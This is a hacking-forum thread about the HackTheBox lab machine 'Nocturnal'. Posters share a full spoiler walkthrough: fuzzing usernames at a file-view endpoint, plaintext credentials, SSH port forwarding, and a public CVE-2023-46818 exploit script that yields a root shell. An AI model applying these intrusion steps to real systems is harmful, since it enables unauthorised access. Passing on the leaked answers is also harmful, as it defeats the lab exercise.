Posts: 216
Threads: 42
Joined: Nov 2024
(Apr 12, 2025, 11:25 PM)machakilos Wrote: here so u dont have to pay : Tobias Credentials (needed for further steps):
tobias lowmotionapocalypse
1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb
2. Read user flag:
cat usert.txt
3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse
4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt Ah man you already shared it ?
I missed it
Mine is almost same and this one is also working fine so no need to pay 8 creds on mine shares method. Sad life.
Posts: 8
Threads: 1
Joined: Oct 2024
(Apr 12, 2025, 09:16 PM)samuelballsiu1 Wrote:
(Apr 12, 2025, 09:12 PM)hujson Wrote: (Apr 12, 2025, 08:59 PM)samuelballsiu1 Wrote: (Apr 12, 2025, 08:53 PM)hujson Wrote: (Apr 12, 2025, 08:10 PM)maggi Wrote: log into site as Amanda
Download backup
Dump the DB
ssh as that user
check local ports for interesting things
how to download the sql dump I'm geting a 403.
Login as amanda:arHkG7HAI68X8s1J
Create backup with the password arHkG7HAI68X8s1J
and unzip with the same password arHkG7HAI68X8s1J
Thanks it worked. But how did you find the creds for that account?
find the privacy.odt file in amanda's files with bruteforcing the username at the /view.php endpoint. After you've done that you can unzip the .odt file and grep for "pass" to find the password for that account
What Wordlist you was use for Bruteforce that have inside the amanda User?
Posts: 27
Threads: 1
Joined: Mar 2025
(Apr 13, 2025, 05:15 AM)RedBlock Wrote: (Apr 12, 2025, 11:25 PM)machakilos Wrote: here so u dont have to pay : Tobias Credentials (needed for further steps):
tobiaslowmotionapocalypse
1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb
2. Read user flag:
cat usert.txt
3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse
4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt Ah man you already shared it ?
I missed it
Mine is almost same and this one is also working fine so no need to pay 8 creds on mine shares method. Sad life. Just remove the 8 credits bro or at least put 1 lol This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Reposting hidden content for free
Posts: 30
Threads: 2
Joined: Apr 2024
(Apr 12, 2025, 08:10 PM)maggi Wrote: (Apr 12, 2025, 07:35 PM)kkkgrukckhko Wrote: We can use this syntax to check our uploads:
nocturnal.htb/view.php?username=amanda&file=privacy.odt
but i doesnt make my revshell work idk why, any suggest?
log into site as Amanda
Download backup
Dump the DB
ssh as that user
check local ports for interesting things
How did you find the name amanda??
Posts: 4
Threads: 3
Joined: Mar 2025
(Apr 12, 2025, 11:25 PM)machakilos Wrote: here so u dont have to pay : Tobias Credentials (needed for further steps):
tobiaslowmotionapocalypse
1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb
2. Read user flag:
cat usert.txt
3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse
4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt
Thanks man! I really appreciate it.
Posts: 20
Threads: 0
Joined: Dec 2023
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse
did ot work for me.
needed to reboot box, to get command execution.
Maybe will help someone
Posts: 1
Threads: 0
Joined: Mar 2025
(Apr 13, 2025, 09:48 AM)Liy4 Wrote: (Apr 12, 2025, 08:10 PM)maggi Wrote: (Apr 12, 2025, 07:35 PM)kkkgrukckhko Wrote: We can use this syntax to check our uploads:
nocturnal.htb/view.php?username=amanda&file=privacy.odt
but i doesnt make my revshell work idk why, any suggest?
log into site as Amanda
Download backup
Dump the DB
ssh as that user
check local ports for interesting things
How did you find the name amanda??
Use burp suite or ZAP (if you don't have pro burp) to fuzz usernames. You can register an account, upload a dummy file. Then you can click on your uploaded file and intercept that request. Then fuzz the username value with a name list. You can sort the response size to find amanda.
Posts: 196
Threads: 31
Joined: Apr 2024
(Apr 13, 2025, 09:48 AM)Liy4 Wrote: (Apr 12, 2025, 08:10 PM)maggi Wrote: (Apr 12, 2025, 07:35 PM)kkkgrukckhko Wrote: We can use this syntax to check our uploads:
nocturnal.htb/view.php?username=amanda&file=privacy.odt
but i doesnt make my revshell work idk why, any suggest?
log into site as Amanda
Download backup
Dump the DB
ssh as that user
check local ports for interesting things
How did you find the name amanda??
fuzing and a wordlist (ffuf is dank)
Posts: 29
Threads: 0
Joined: Jun 2024
thanks for sharing brother
Posts: 3
Threads: 0
Joined: Apr 2025
(Apr 12, 2025, 11:02 PM)bl4cksku11 Wrote: Easy root:
That's it! Pwned. Enjoy
how did you found out this vulnerability?
|
